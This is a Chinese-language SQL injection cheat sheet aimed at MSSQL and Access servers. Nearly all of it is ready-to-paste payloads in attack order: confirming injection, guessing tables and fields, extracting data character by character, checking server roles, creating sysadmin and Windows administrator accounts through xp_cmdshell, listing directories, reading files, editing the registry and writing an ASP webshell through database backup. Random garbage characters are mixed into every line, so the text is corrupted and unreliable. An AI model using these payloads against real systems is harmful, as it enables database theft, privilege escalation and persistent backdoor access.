1.判断是否有注入;and 1=1 ;and 1=2 '�QC�IKCn<
2.初步判断是否是mssql ;and user>0 /�I`TN5~��
z�eHF�-_{�
3.注入参数是字符'and [查询条件] and ''=' 9G�D0jJEu�
{cm?Q\��DT
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �_R�bfyyaN
6{y7�e L3!
5.判断数据库系统 fC�r2'+O"b
t1Ft�YXv`/
;and (select count(*) from sysobjects)>0 mssql e��x�b}
y�
8��6r"�hy~
;and (select count(*) from msysobjects)>0 access h�C<�R��OD
!�DZ=`a?y
�UX)G�A[WI
_Je��4&K�U
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �}%_|k^t�
Zhq_ pus"a
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �$D^\�[^S
IOl_J>D]F
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 X.fVbePxUU
^P�Z[;F40�
9.(1)猜字段的ascii值(access) S<�i$0p8J;
rO�Sov"7��
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 i�HD�!v7d7
�2�Lw�J�%!
(2)猜字段的ascii值(mssql) ]@&X*~c^Z�
DK��IH{:L7
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 F0�:]@0>�r
aA`eKy�) \
10.测试权限结构(mssql) �J2=4%#R!
l�00i��2w�
b#6S�8C+�@
*G58�t�`]r
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ${ {4�L�?7
f7=��M�gFi
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- YX����A@
c
*)�Rm�X$v3
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ;k�gP�:�n�
0Jl�NUO5Nt
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ��3�(�BL��
X�0�.H(p#s
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �/�Q1�*Vh4
�yf�G;OnkZ
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 46:<[0Psl/
u��H[�WlZ4
;and 1=(select IS_MEMBER('db_owner'));-- aC�G r�S�{
+4?Lwp�'�q
��{i�D/0q�
<]�rayUyaf
11.添加mssql和系统的帐户 l/N<'T�_�G
��ZJ/528Ju
;exec master.dbo.sp_addlogin username;-- �J�>Ar(�p�
;exec master.dbo.sp_password null,username,password;-- LDt�6<D8,Q
�$plk>K�hg
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �f��;e#7�_
\��dk�1a��
;exec master.dbo.xp_cmdshell 'net user username password � FOiwA.:0
qOo4T@�t3�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- %��N�8I'*u
f8Hq&_Pn��
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ~a�pt,�hl
�z=���D�5*
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 6FB�0�g��8
*�rq��*li;
c^r8�<KlI9
�z$1RD)TQB
12.(1)遍历目录 fb�q$:Q44�
ziM{2��Fs>
;create table dirs(paths varchar(100), id int) �6<&A}��pp
J6�Ilg@�}\
;insert dirs exec master.dbo.xp_dirtree 'c:\'
'L�YDJ�~�
2/?Zp=�|j\
;and (select top 1 paths from dirs)>0 ��C�[�^VM$
lJ�K]S=c�d
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) t�ia}��&9;
,P��~�e)<.
J��}V4.R5d
a�q?bI:�>8
(2)遍历目录 scV�%p&�{a
?@�"@9na��
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- =�Vg~ VD �
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �����yq�~�
?{J�1�&;j*
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �+�Br<;�sW
n_Quu��UB
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 TK5$-��6�k
K$S0h-?9]O
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
M^k��aik�
�qY�oW8e��
c����~T�{;
:�w^:Z$-hf
13.mssql中的存储过程 Q�7+WV�`�&
KMhrw s{&B
xp_regenumvalues 注册表根键, 子键 s\�*p��|vc
$x�u2�ZBK�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Zo��=,!@q(
Ab$E�@H��#
xp_regread 根键,子键,键值名 )q$[u�S_1[
4ph�C��n5
;exec xp_regread 0AnL]`"t.3
#(]�D�]f[@
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 sU�F$eVAT�
h[�(YH ;Y
xp_regwrite 根键,子键, 值名, 值类型, 值 ^A���� ]4�
�Ijh�RSrCv
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 O�@�$�>'Z�
2-F7tc�ya|
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 x�U\!UVQ/�
!WyJ@pFU^�
xp_regdeletevalue 根键,子键,值名 UC�&��$�8^
?wtKi#k'v#
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 xM_#F��xJb
\%r�#>8�c8
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 r'i9��9�~
Rxy|Ag/I;V
kH 9�k<��{
}�w�f�8y�
14.mssql的backup创建webshell sX?arI=�_U
~D5
-G?%$"
use model �}-[l)<F�:
X��"Eqhl<t
create table cmd(str image); S��r�A6}kS
a�s:=��QMV
insert into cmd(str) values (''); e�i�2?H;H;
��DS8H�SSD
backup database model to disk='c:\l.asp'; �2��?,l�r2
dwn|1�%��D
r,�eH7&P9{
q�;SD+%tI�
15.mssql内置函数 t_�/qd9J�v
o9sQ!gptw
;and (select @@version)>0 获得Windows的版本号 �GVT� 6cR�
{r&r^�!K;�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �&wNr2PHd#
cJS�NV�*<�
;and (select user_name())>0 爆当前系统的连接用户 W@}@5,}f>�
B+FTkJ0t+G
;and (select db_name())>0 得到当前连接的数据库 +�aL6��$�
�x.g�z�sd�
|mhKD#���:
oX6�C�d:c-
16.简洁的webshell >uC�O=T,�|
�PCCE+wC6
use model X}�B]���5
&�Zz&Vw�WR
create table cmd(str image); 8�h�
ol4'B
0,0WdJA�e�
insert into cmd(str) values (''); y�1�`�%�3\
`y'%dY}$�n
backup database model to disk='g:\wwwtest\l.asp';
